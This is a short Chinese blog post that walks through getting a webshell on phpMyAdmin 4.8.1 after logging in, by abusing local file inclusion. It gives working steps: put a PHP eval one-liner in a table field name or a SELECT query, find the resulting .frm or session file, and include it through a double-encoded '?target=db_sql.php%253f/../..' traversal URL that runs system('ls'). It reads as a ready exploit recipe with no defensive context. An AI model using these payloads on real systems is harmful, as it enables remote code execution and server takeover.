phpmyadmin4.8.1后台getshell
2024-09-08 01:38:36
phpmyadmin4.8.1后台getshell
包含文件进行getshell
姿势:
①
建立数据库的,新建表,字段名为一句话木马。
会生成对应的数据库文件,相应文件的路径查看
select @@datadir;
这个样子就会在/var/lib/mysql/hack/hack.frm的文件里包含着一句话木马的字段。
?target=db_sql.php%253f/../../../../../../var/lib/mysql/data/hack/hack.frm
权限不够,
不过这个再linux下面倒是很简单,不用考虑权限。
②
查询语句(一句话木马),
执行查询
select '<?php @eval($_GET["code"])?>'
之后会保存在session文件里。
session文件:
/var/lib/php/sessions/sess_你的SESSION ID
包含payload:
?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_6ker17rs59cuu39e6rfdpdrcaoto5116&a=system("ls");
最新文章
- 用GO语言开发editplus编辑器插件(附源码)
- 函数查询(Function Query)
- Hibernate 性能优化之二级缓存
- Sonar入门(五):使用 Sonar 进行代码质量管理
- Intellij idea workflow 工作流插件安装
- Android 4.0 ProGuard 代码混淆 以及 proguard returned with error code 1.See console异常的解决方法
- Android-2手机应用程序,短信应用
- Android Splash界面支持用户点击 直接进入主界面
- iOS消息推送相关
- 分布式架构实战--ActiveMQ的安装与使用(单节点)
- Restful levels&HATEOAS
- NFPA, UL
- 利用redis List队列简单实现秒杀 PHP代码实现
- Web前端开发必备
- ThinkPHP5的数据操作和Thinkphp3.2.3对比小结
- Qt Creator 中,如何更改h,cpp,ui的文件并不让ui失效
- 震旦199打印机扫描A4文件
- Keil MDK忽略警告:文件末尾空白行警告
- vue项目实现列表页-详情页返回不刷新,再点其他菜单项返回刷新的需求
- java客户端调用ftp上传下载文件